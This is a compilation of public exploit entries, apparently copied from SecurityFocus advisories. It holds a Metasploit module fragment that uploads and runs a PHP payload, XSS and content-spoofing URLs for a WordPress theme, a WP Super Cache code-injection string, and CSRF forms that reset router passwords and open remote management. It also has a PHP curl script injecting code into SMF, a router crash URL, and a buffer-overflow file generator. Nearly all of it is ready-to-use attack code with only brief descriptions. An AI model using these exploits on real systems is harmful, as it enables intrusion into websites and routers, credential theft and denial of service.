    payload_name = "#{Rex::Text.rand_text_alpha_lower(10)}.php"

    data = Rex::MIME::Message.new
    data.add_part('my_image', nil, nil, 'form-data; name="plugin"')
    data.add_part('My image', nil, nil, 'form-data; name="title"')
    data.add_part('4', nil, nil, 'form-data; name="position"')
    data.add_part('', nil, nil, 'form-data; name="caption"')
    data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"image\"; filename=\"#{payload_name}\"")
    data.add_part('1', nil, nil, 'form-data; name="image_resize"')
    data.add_part('230', nil, nil, 'form-data; name="image_width"')
    data.add_part('200', nil, nil, 'form-data; name="image_height"')
    data.add_part('auto', nil, nil, 'form-data; name="image_option"')
    post_data = data.to_s

    vprint_status("#{peer} - Uploading payload...")
    res = send_request_cgi(
      'method'        => 'POST',
      'uri'           => normalize_uri(target_uri, 'admin.php'),
      'vars_get'      => {
        'controller'  => 'plugins',
        'action'      => 'config',
        'plugin'      => 'my_image'
      },
      'ctype'         => "multipart/form-data; boundary=#{data.bound}",
      'data'          => post_data,
      'cookie'        => cookie
    )

    if res && /Call to a member function getChild\(\) on a non\-object/ === res.body
      fail_with(Failure::Unknown, 'Unable to upload payload. Does the server have the My Image plugin installed?')
    elsif res && !( res.body.include?('<b>Warning</b>') || res.body.include?('warn') )
      fail_with(Failure::Unknown, 'Unable to upload payload.')
    end

    vprint_good("#{peer} - Uploaded the payload.")

    php_fname = 'image.php'
    payload_url = normalize_uri(target_uri.path, 'content', 'private', 'plugins', 'my_image', php_fname)
    vprint_status("#{peer} - Parsed response.")

    register_files_for_cleanup(php_fname)
    vprint_status("#{peer} - Executing the payload at #{payload_url}.")
    send_request_cgi(
      'uri'     => payload_url,
      'method'  => 'GET'
    )
  end
end
HireHackking 
source: https://www.securityfocus.com/bid/59371/info

The Colormix theme for WordPress is prone to multiple security vulnerabilities, including:

1. A cross-site scripting vulnerability
2. A path-disclosure vulnerability
3. Multiple content-spoofing vulnerabilities

An attacker may leverage these issues to obtain potentially sensitive information and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible. 

Content spoofing:

http://www.example.com/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?config=1.xml

http://www.example.com/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=http://www.example1.com

http://www.example.com/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&image=1.jpg

http://www.example.com/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF

Cross-site scripting:

http://www.example.com/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B
HireHackking 
source: https://www.securityfocus.com/bid/59470/info

The WP Super Cache plugin for WordPress is prone to a remote PHP code-execution vulnerability.

An attacker can exploit this issue to execute arbitrary PHP code within the context of the web server.

WP Super Cache 1.2 is vulnerable; other versions may also be affected. 

<!?mfunc echo PHP_VERSION; ?><!?/mfunc?>
HireHackking 
source: https://www.securityfocus.com/bid/59442/info

The TP-Link TL-WR1043N Router is prone to a cross-site request-forgery vulnerability.

Attackers can exploit this issue to perform certain administrative actions and gain unauthorized access to the affected device. 

d> <title>Cisco WRT310Nv2 Firmware v2.0.01 CSRF/XSS</title> <!--*Discovered by: Jacob Holcomb - Security Analyst @ Independent Security Evaluators --> </head> <body> <form name="CSRFxssPWN" action="http://ww.example.com/apply.cgi" method="post"/> <input type="hidden" name="submit_button" value="Management"/> <input type="hidden" name="action" value="Apply"/> <input type="hidden" name="PasswdModify" value="1"/> <input type="hidden" name="http_enable" value="1"/> <input type="hidden" name="wait_time" value="0"/> <input type="hidden" name="http_passwd" value="ISE_1337"/> <input type="hidden" name="http_passwdConfirm" value="ISE_1337"/> <input type="hidden" name="_http_enable" value="1"/> <input type="hidden" name="remote_management" value="1"/> <input type="hidden" name="remote_upgrade" value="1"/> <input type="hidden" name="remote_ip_any" value="1"/> <input type="hidden" name="http_wanport" value="1337"/> <input type="hidden" name="upnp_enable" value="1"/> <input type="hidden" name="upnp_config" value="1"/> <input type="hidden" name="upnp_internet_dis" value="1"/> </form> <script> function PwN() {document.CSRFxssPWN.submit();}; window.setTimeout(PwN, 0025); </script> <body> </html>
HireHackking 
source: https://www.securityfocus.com/bid/59409/info

SMF is prone to an HTML-injection and multiple PHP code-injection vulnerabilities.

An attacker may leverage these issues to execute arbitrary server-side script code on an affected computer with the privileges of the affected application and inject hostile HTML and script code into vulnerable sections of the application.

SMF 2.0.4 is vulnerable; other versions may also be affected. 

<?php

// proof of concept that latest SMF (2.0.4) can be exploited by php injection.

// payload code must escape from \', so you should try with something like
// that:
// p0c\';phpinfo();// as a 'dictionary' value. Same story for locale
// parameter.
// For character_set - another story, as far as I remember, because here we
// have
// a nice stored xss. ;)

// 21/04/2013 
// http://HauntIT.blogspot.com

// to successfully exploit smf 2.0.4 we need correct admin's cookie:
$cookie = 'SMFCookie956=allCookiesHere';
$ch =
curl_init('http://smf_2.0.4/index.php?action=admin;area=languages;sa=editlang;lid=english');

curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_COOKIE, $cookie);
curl_setopt($ch, CURLOPT_POST, 1); // send as POST (to 'On')
curl_setopt($ch, CURLOPT_POSTFIELDS,
"character_set=en&locale=helloworld&dictionary=p0c\\';phpinfo();//&spelling=american&ce0361602df1=c6772abdb6d5e3f403bd65e3c3c2a2c0&save_main=Save");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

$page = curl_exec($ch);

echo 'PHP code:<br>'.$page;

curl_close($ch); // to close 'logged-in' part

?>
HireHackking 
source: https://www.securityfocus.com/bid/59476/info

Belkin F5D8236-4 Router is prone to a cross-site request-forgery vulnerability.

Attackers can exploit this issue to perform certain administrative actions and gain unauthorized access to the affected device. 

<html> <head> <title>Belkin F5D8236-4 v2 CSRF - Enable Remote MGMT.</title> <!-- Use JavaScript debugging to bypass authentication --> <!--*Discovered by: Jacob Holcomb - Security Analyst @ Independent Security Evaluators --> </head> <body> <form name="belkin" action="http://X.X.X.X/cgi-bin/system_setting.exe" method="post"/> <input type="hidden" name="remote_mgmt_enabled" value="1"/> <input type="hidden" name="remote_mgmt_port" value="31337"/> <input type="hidden" name="allow_remote_ip" value="0"/> </form> <script> function BeLkIn() {document.belkin.submit();}; window.setTimeout(BeLkIn, 0000); </script> <body> </html>
HireHackking 
source: https://www.securityfocus.com/bid/59445/info

The Cisco Linksys WRT310N Router is prone to multiple denial-of-service vulnerabilities when handling specially crafted HTTP requests.

Successful exploits will cause the device to crash, denying service to legitimate users. 

http://www.example.com/apply.cgi?pptp_dhcp=0&submit_button=index&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&lan_ipaddr=4&wait_time=0&need_reboot=0&dhcp_check=&lan_netmask_0=&lan_netmask_1=&lan_netmask_2=&lan_netmask_3=&timer_interval=30&language=EN&wan_proto=dhcp&wan_hostname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=255.255.255.0&url_address=my.wrt310n&lan_proto=dhcp&dhcp_start=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&wan_wins_3=AAAAAAAAAAAAAAAAAAA&time_zone=-08+1+1&_daylight_time=1
HireHackking 
source: https://www.securityfocus.com/bid/59534/info

Elecard MPEG Player is prone to a buffer-overflow vulnerability because the application fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer.

Attackers can execute arbitrary code in the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.

Elecard MPEG Player 5.8 is vulnerable; other versions may also be affected. 

#!/usr/bin/python 
# Exploit Title:Elecard MPEG Player 5.8 Local PoC 
# Download link :www.elecard.com/assets/files/distribs/mpeg-player/EMpgPlayer.zip
# Product: Vulnerable
# Elecard MPEG Player,Elecard AVC HD Player
# RST
# Date (found): 27.04.2013
# Date (publish): 27.04.2013
# Author: metacom
# version:5.8.121004
# Category: poc
# Tested on: windows 7 German  

head="#EXTM3U\n"
head+="#EXTINF:153,Artist - song\n"
filename= "elecard.m3u"

buffer= "\x41" * 783
buffer+="\x42" * 4 
buffer+="\x43" * 4
buffer+="\x44" * 25000

textfile = open(filename , 'w')
textfile.write(head+buffer)
textfile.close()